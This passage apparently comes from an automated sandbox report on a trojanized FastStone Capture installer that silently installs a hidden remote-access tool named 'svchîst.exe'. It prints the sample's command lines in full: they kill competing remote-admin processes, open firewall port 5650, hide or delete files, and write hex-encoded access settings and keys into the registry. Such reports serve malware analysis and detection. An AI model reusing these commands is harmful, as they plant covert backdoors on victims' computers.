653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223639313130223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c4653456c3461323155515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c4a484f58525a563278315355633161474a585657646a4d3278365a45645764456c49546d786a626c70775933704661553144515564424d5656465158643357677053527a6c305756647364556c484e5768695631566e597a4e73656d5248566e524a534535735932356163474e3651575647647a4235545770424d45317159336c4e56456b7a5455526f59555a334d48704e616b4577436b317155586c4e56456b7a5455526f5955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73525749794d576868567a526e596d314764467054516e6f4b5a56684f4d4670584d47646a4d6c5a355a473173656b31545358644a51566c45566c465252455243624556694d6a466f595663305a324a74526e526155304a365a56684f4d4670584d47646a4d6c5a355a4731736567704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a30744451564646515859774e566c6f566c6450576a4d77656c645164316c6e54306c5a436d59765a6d513561586c57576a6c484e58565253484a686357464652577051555868354e7a56756556683663454e695532356f52474d7257474a685a566c554d304972616c4130556e5a5857453945556d70514c7a454b5248677757574e33535755314f57497a54566c4c59314a546458467a4f54567756564673656d773151693879516b524a63335635646d6869554778705a53733557566f31646c6461656e7055556b466e61557474576770304c304530556e5a6e62546c304f45566d6545526853577434516b64714e4735424e324a5455544e544d544654536c56485a584577626e5a79535774715557387661324532655656535a544a6e634664574e7a5630436d31505a556c726555357a643274714d5774364e31526164556c5665453570543359305547527a51334e615755744c5532353362314a5a4d486846656c425a5647565a55465236546b3961596a5930655535724d33514b6155497962585a3059335a4d56316452616c4a73556d7872543352545756466e513039564d555577527a5a4c566d67354e5574534e586b3154466c7059314a7357533971655745724e3364795a474e4f5953394455676f7a55556c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b4652516d35735a6d46354e3155324d48564d575538786331417663476836656c5a364b327472646b4e6a436a51794e6c6c4f59334678563064466469744b546d6c4763546776554870544d564271524646616245466964556852524852445955394c566e4e7961474e45556b4673616e55314f47395352585a6a4e6c52564e30494b4e6a526d4d574a794e584e71544851334e584e524d30307657484a345456704263564249616e647763565a505455307a655868615330686b5245355a4d586c55566b3174596b3147556d6c594f475a30554652495641704555556479537a4577516a684f4f444e6164556c5462445a4f4e58423061314a304e6e6f345a44524b626d5a5455555a755a7a4d30516d646f545464594f55347857554659656c4e56626a4a4252304a4a57576b35436b4a7553325a426557787965445a68546a6c4b4f4856706257316f596e593259304678516c566957444a695957646b617a4252656d394353584a53617a5976536a4e5062484e704d446459617a45764d3268355745344b4f45387761476879626a41785a45784a57454e59636c464e647a6870614842505557787159306874595735484c30354856466f724e334a335a5646455a6d5179576d6878574735724e6b634b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a5355563255556c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b746a6432646e553270425a3056425157394a516b46525179395562476c47566c6b31626d5a55546c6b4b4c304a705154526f614338354f544d7954457057626a4269625456425a58527863473952553030355245684d646d316d536d5a506130703053325646546e6f315a4852774e576851593067325453396f527a6c6159776f30546b644e4c7939565545685361487042614464754d585a6a6547647765455a4c4e6e46364d323173556b4e59543168725343395a525531706554644c4b305a7a4b31644b4e7a6378614735744f5670755545354f436b564451306c78576d307a4f45526f52797444596a497a6431497652553576615652465257465161574e456448524b5247524d57465a4a624646614e6e4a545a53747a61564e4f51326f72556e4a79536c4a474e32454b5132786157485a744d6c6b314e476c5553544a3651314e5156315251644535744e47685552544a4a4e69396e4f544a33533368735a32397753325a4461455a715645565554546c6f546a566e4f56424e4d44567364677079616b6b7956475579535568685953737865546830576c7044546b6457523164524e6a464b61454e425354565556565252596d39775630677a61334249626b787264476c4b6545645761697451536e4933646b4e30436a46334d584934536b686b5157644e516b464252554e6e5a305642596b35304e7a593054575a7655335a5351304a58544573726444637a57466443656b45335957685756555a3457586c6c526c4259616e56545a6d454b4e6c5235526e5273567a4a4c5a6c6c6b59585634566d74584e574e4c4d45684b4c7a5a76645759764d6b524a556a5a6a626e647a563356344e323553635739355553744b513270304d6e5a61626e705061574e4f5367705662446b325933646e4e6d5233647a45314c33426c5a4774775247783457476452595764534d306c424b33646b4f473561516e67354e5339704f56525656485a6f6545747656555a5859576c74523368315a57646e436b59315446647464486c59556e70494d314576613273316244497257584579537a4244635441304e557075646d68685669383256466c736133705665584a6f64334a76626c466a616b314b4e486844576b5a7a4b33494b51305a6c556b6c5a5a45786a526a4a5954556c3359557433536d3143595452334d44466a64556c48564567346346563263566c42536d684c656b5a5761326830596a4930516d4a695a4646615a31424d5930553156777047636d5130553077776555784952445172616c4655625849334d444a684e7a6c51656d45776543393356466c6f4e47747356334e775a31464c516d6452524756686347513259337031524574744c3273794e33646b436a5a68565777336145684c57564a31526c6c495a555653656a517955544246537a5a71536b4e47576c4247613055785a576433643246564c31526d6556527257484a56526b70565a303951626e67724c3274355a32734b54565668546c4248654531755a4651344e576469614864516555396e5445646e553368334d6d4e4661566c75576c425a52444d346255686853456c325a54464651584a585955464f6544567262574635556b4e4353676f3352334a7359324a69526b74684b3255346347526e5655563462454a4b52585673555574435a31464559303155533152785757394e6547777a4e303535576c4a544e6b49776333643152474d345155396b55476477436c4d7a4f54467262586c33566a5a424c325a6b55456c695747646d626d5236546d39475379393563314e76656b74735255645253305654656e6f3065574534546e6b3161586c7761445a5856546b336430464a5353384b526d744d627a46546254517a4d6b686a5746567756485672576b39505a6b4632537a426b4d54493053324a464e5535444d7a4271516a526d5a6d68796357464862556443646d567665544a75626e644c4f58497a526770524e474e4c655852546330745253304a6e52336b77616d6c78564464584f56524c4d30316e616d78595656683462327832526a5134616d5a59626c4e3554455678656e686a54456c7a53556c6b4e4452784e485633436a46764b33517a65477836526c5671574556585a4739454d3039735a56465a5630564c4f564e5961477478563056426346643361334a55646b513051555134555656774c31686c53477850626b704361544a786144414b647a6c4461545a7354566833626a4e61616d6443615770774d6d686b51304e69526b5653625778614d584a3462574e364e5467354c3245774d5446615a46517951326844536c706c5a6e524262306443515570325a67704e4f5751784e5374555a453034516c684d55575a5761573550655567774f576836517a5232646c5a444d6c46715979396d56453572516b6431546e4a715458557765446c4861433877525570704c326330566b4a42436974514d324d79626e637253334131554667784d574a774b79747555335a59546e6f7a4e6b565559546c4f52325a6163577730644739716231564b5a3156724b3052325247356a546b4a7155324e59656e45775555384b523231324d315a71524868326355564552334177616b5a326133706d63457777536b46724e6a4972534752355331687853317036634546765230464e554868755747683061464e684d6c526d4d46684a6255356f564170765954426d4d6a5a31626d705962556434617a6b335744686a52585633646d6c6862577472554374785a33464f5a7a68574e554a4c5256597a4b30744f5a6e67334c324a4b564468785a6e55315a4770704b314e5a436d38305330355a57586c53616d35306445684f53577861526a644c56555649613251724d46466a544764786258465864335231566a6476617a6c6e4c3146504e693936636e424d5469387a63584a6a5345646b61586b4b53445a536547394c4d484d79624373304e455233516d524464475a4261326339436930744c533074525535454946425353565a42564555675330565a4c5330744c53304b3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 336 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 952 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 912 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 912 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 912 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 912 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 952 wrote to memory of 1148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 336 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 336 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 336 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 336 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 336 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 336 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 336 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 912 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 912 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 912 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 912 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 912 wrote to memory of 328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 912 wrote to memory of 328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 912 wrote to memory of 328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 912 wrote to memory of 328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 912 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 912 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 912 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 912 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 708 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\netsh.exe
PID 708 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\netsh.exe
PID 708 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\netsh.exe
PID 708 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\netsh.exe
PID 912 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 912 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 912 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 912 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 912 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 912 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 912 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 912 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 912 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 912 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 912 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 708 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\route.exe
PID 708 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\route.exe
PID 708 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\route.exe
PID 708 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\route.exe
PID 1000 wrote to memory of 640 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\system32\conhost.exe
PID 1000 wrote to memory of 640 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\system32\conhost.exe
PID 1000 wrote to memory of 640 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\system32\conhost.exe
PID 1000 wrote to memory of 640 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\system32\conhost.exe
PID 1000 wrote to memory of 884 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 884 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe

"C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f& REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f& Exit

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f

C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe

"C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe" /S /IR

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening TCP 5650 "Open Port 5650"

C:\Windows\SysWOW64\netsh.exe

netsh.exe advfirewall firewall delete rule name="all" remoteip=95.141.193.133

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650

C:\Windows\SysWOW64\drivers\install.exe

"C:\Windows\System32\drivers\install.exe"

C:\Windows\SysWOW64\route.exe

route.exe delete 95.141.193.133

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3